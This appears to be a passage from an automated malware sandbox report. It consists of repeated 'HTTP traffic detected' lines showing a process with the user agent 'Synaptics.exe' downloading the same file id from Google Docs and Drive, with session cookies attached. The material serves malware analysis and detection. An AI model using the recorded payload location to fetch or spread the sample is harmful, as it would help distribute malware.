                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
